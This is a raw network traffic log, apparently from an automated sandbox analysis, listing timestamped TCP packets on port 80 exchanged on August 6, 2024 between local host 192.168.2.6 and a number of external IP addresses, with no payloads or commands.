                                                                                                                                    Aug 6, 2024 10:29:18.423763990 CEST4973180192.168.2.643.132.81.173
                                                                                                                                    Aug 6, 2024 10:29:18.429171085 CEST804973143.132.81.173192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.429636955 CEST4973180192.168.2.643.132.81.173
                                                                                                                                    Aug 6, 2024 10:29:18.430912018 CEST8049732163.171.208.133192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.439614058 CEST4973280192.168.2.6163.171.208.133
                                                                                                                                    Aug 6, 2024 10:29:18.444922924 CEST8049732163.171.208.133192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.444978952 CEST4973280192.168.2.6163.171.208.133
                                                                                                                                    Aug 6, 2024 10:29:18.754584074 CEST804973743.159.71.118192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.758860111 CEST4973780192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:29:18.760914087 CEST804972647.94.225.221192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.763883114 CEST4972680192.168.2.647.94.225.221
                                                                                                                                    Aug 6, 2024 10:29:18.764111996 CEST804973743.159.71.118192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.764363050 CEST4973780192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:29:18.806988001 CEST804973347.254.187.183192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.807018042 CEST804973347.254.187.183192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.807121992 CEST4973380192.168.2.647.254.187.183
                                                                                                                                    Aug 6, 2024 10:29:18.818062067 CEST4973380192.168.2.647.254.187.183
                                                                                                                                    Aug 6, 2024 10:29:18.823323965 CEST804973347.254.187.183192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.823542118 CEST4973380192.168.2.647.254.187.183
                                                                                                                                    Aug 6, 2024 10:29:18.935287952 CEST8049727113.219.142.35192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:18.940654993 CEST4972780192.168.2.6113.219.142.35
                                                                                                                                    Aug 6, 2024 10:29:19.540962934 CEST804973660.221.222.1192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.556390047 CEST4973680192.168.2.660.221.222.1
                                                                                                                                    Aug 6, 2024 10:29:19.560262918 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:19.566167116 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.569197893 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:19.576339006 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:19.581159115 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.726833105 CEST4974080192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:19.728950024 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:19.730771065 CEST4974280192.168.2.647.242.126.205
                                                                                                                                    Aug 6, 2024 10:29:19.731692076 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.731755018 CEST4974080192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:19.732044935 CEST4974080192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:19.733195066 CEST4974380192.168.2.68.212.11.147
                                                                                                                                    Aug 6, 2024 10:29:19.733746052 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.733822107 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:19.734055996 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:19.735544920 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.735608101 CEST4974280192.168.2.647.242.126.205
                                                                                                                                    Aug 6, 2024 10:29:19.735825062 CEST4974280192.168.2.647.242.126.205
                                                                                                                                    Aug 6, 2024 10:29:19.736804008 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.738116980 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.738179922 CEST4974380192.168.2.68.212.11.147
                                                                                                                                    Aug 6, 2024 10:29:19.738447905 CEST4974380192.168.2.68.212.11.147
                                                                                                                                    Aug 6, 2024 10:29:19.738857031 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.740637064 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:19.743238926 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.672442913 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.672473907 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.673536062 CEST4974280192.168.2.647.242.126.205
                                                                                                                                    Aug 6, 2024 10:29:20.680211067 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.680553913 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.680926085 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:20.688518047 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.688543081 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.688555956 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.688606977 CEST4974280192.168.2.647.242.126.205
                                                                                                                                    Aug 6, 2024 10:29:20.689290047 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.689342022 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.689359903 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.689382076 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.689393997 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.689439058 CEST4974080192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:20.689567089 CEST4974080192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:20.693689108 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.693727970 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.693742990 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.693794966 CEST4974380192.168.2.68.212.11.147
                                                                                                                                    Aug 6, 2024 10:29:20.693804979 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.693819046 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.693882942 CEST4974380192.168.2.68.212.11.147
                                                                                                                                    Aug 6, 2024 10:29:20.696383953 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.696398020 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.696412086 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.696822882 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:20.712966919 CEST4974380192.168.2.68.212.11.147
                                                                                                                                    Aug 6, 2024 10:29:20.712982893 CEST4974080192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:20.718292952 CEST80497438.212.11.147192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.718421936 CEST4974380192.168.2.68.212.11.147
                                                                                                                                    Aug 6, 2024 10:29:20.719388008 CEST80497408.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.719532967 CEST4974080192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:20.739130974 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739209890 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739223003 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739234924 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739243031 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:20.739248991 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739262104 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739276886 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739284039 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:20.739284039 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:20.739316940 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739330053 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739346981 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:20.739347935 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.739375114 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:20.741208076 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:20.750389099 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.750406027 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.750421047 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.752671003 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:20.774897099 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.787349939 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.804910898 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:20.810811996 CEST4974280192.168.2.647.242.126.205
                                                                                                                                    Aug 6, 2024 10:29:20.810858011 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:20.816464901 CEST804974247.242.126.205192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.816684961 CEST80497418.218.30.151192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:20.816761971 CEST4974280192.168.2.647.242.126.205
                                                                                                                                    Aug 6, 2024 10:29:20.816785097 CEST4974180192.168.2.68.218.30.151
                                                                                                                                    Aug 6, 2024 10:29:21.053143024 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.053163052 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.053178072 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.053437948 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.053491116 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.053739071 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.053756952 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.053935051 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.053982019 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.053992987 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.054008961 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.054697990 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.054828882 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.054840088 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.054852962 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.054930925 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.055622101 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.055634022 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.055645943 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.055672884 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.055927038 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.144084930 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.192354918 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.398555040 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.398576975 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.398588896 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.398602009 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.398621082 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.398649931 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.398722887 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.398991108 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399003029 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399015903 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399060011 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.399082899 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399095058 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399111032 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.399461031 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.399934053 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399946928 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399960995 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.399996042 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.400022984 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.400094032 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:21.430979967 CEST8049721111.124.200.101192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.433588028 CEST4972180192.168.2.6111.124.200.101
                                                                                                                                    Aug 6, 2024 10:29:21.485761881 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.504273891 CEST4974480192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:21.509155035 CEST80497448.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.509418011 CEST4974480192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:21.509418011 CEST4974480192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:21.509438992 CEST4974480192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:21.514388084 CEST80497448.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.515158892 CEST80497448.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:21.536096096 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:22.451263905 CEST80497448.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:22.504849911 CEST4974480192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:24.626949072 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.626966953 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.626976967 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.627043962 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:24.965373039 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.965389967 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.965408087 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.965419054 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.965430021 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:24.965440035 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:24.965485096 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.295851946 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.295878887 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.295891047 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.295902967 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.295926094 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.295980930 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.639355898 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.639365911 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.639413118 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.639447927 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.639461040 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.639472008 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.639482975 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.639499903 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.639532089 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.983417988 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.983434916 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.983447075 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.983458042 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.983469963 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.983493090 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.983514071 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:25.983746052 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.983784914 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:25.983812094 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.036336899 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.070781946 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.114346981 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.503056049 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503078938 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503093958 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503108025 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503144979 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.503166914 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503177881 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.503184080 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503200054 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503220081 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503230095 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.503242970 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.503268957 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.503290892 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.659248114 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659274101 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659288883 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659305096 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659320116 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659328938 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.659379005 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.659519911 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659558058 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.659594059 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659615040 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659630060 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659643888 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:26.659667969 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:26.659697056 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.160383940 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160414934 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160450935 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160464048 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160468102 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.160480022 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160501003 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.160521030 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160535097 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160548925 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160562038 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160568953 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.160578012 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160609961 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.160635948 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.160794020 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160813093 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160850048 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.160860062 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.160921097 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.462465048 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462481022 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462496042 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462510109 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462524891 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462549925 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.462591887 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.462696075 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462709904 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462724924 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462738991 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462740898 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.462765932 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462774992 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.462781906 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462805986 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462812901 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.462825060 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462841034 CEST80497448.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.462850094 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.463009119 CEST4974480192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:27.463831902 CEST4974480192.168.2.68.218.87.7
                                                                                                                                    Aug 6, 2024 10:29:27.468789101 CEST80497448.218.87.7192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.504895926 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.648839951 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.648888111 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.648909092 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.648924112 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.648927927 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.648937941 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.648983002 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.649312019 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.649326086 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.649358034 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.649362087 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.649377108 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.649391890 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.649394989 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.649435043 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:27.650213957 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.650238037 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:27.650310993 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.554157019 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.554172039 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.554228067 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.554239035 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.554256916 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.554258108 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.554269075 CEST804973927.221.16.149192.168.2.6
